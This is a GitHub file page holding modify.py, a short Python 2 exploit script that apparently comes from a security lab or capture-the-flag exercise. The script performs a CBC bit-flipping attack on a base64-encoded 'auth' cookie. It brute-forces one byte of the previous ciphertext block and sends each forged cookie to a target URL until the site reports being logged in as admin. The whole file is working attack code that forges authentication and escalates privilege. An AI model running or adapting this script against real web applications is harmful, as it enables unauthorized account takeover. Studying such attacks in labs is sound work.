-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathmodify.py
More file actions
executable file
·32 lines (27 loc) · 848 Bytes
/
modify.py
File metadata and controls
executable file
·32 lines (27 loc) · 848 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#! /usr/bin/python2
import base64
import urllib
import requests
import sys
url = sys.argv[1]
cookie = sys.argv[2] #????????user=bdmin\x06\x06\x06\x06\x06\x06
length = 8
#convert cookie
cookie = urllib.unquote_plus(cookie)
cookie = base64.b64decode(cookie)
temp = []
for c in cookie:
temp.append((hex(ord(c))))
cookie = temp
index_to_modify = 13 - length #'b' is at 13 (5 in its "chunk") but we will modify 5th character in previous "chunk"
expected = "You are currently logged in as admin"
for value in range(0, 256):
cookie[index_to_modify] = hex(value)
new_cookie = []
for c in cookie:
new_cookie.append(chr(int(c, 16)))
new_cookie = urllib.quote_plus(base64.b64encode("".join(new_cookie)))
r = requests.get(url, cookies={"auth": new_cookie})
if expected in r.text:
print new_cookie
break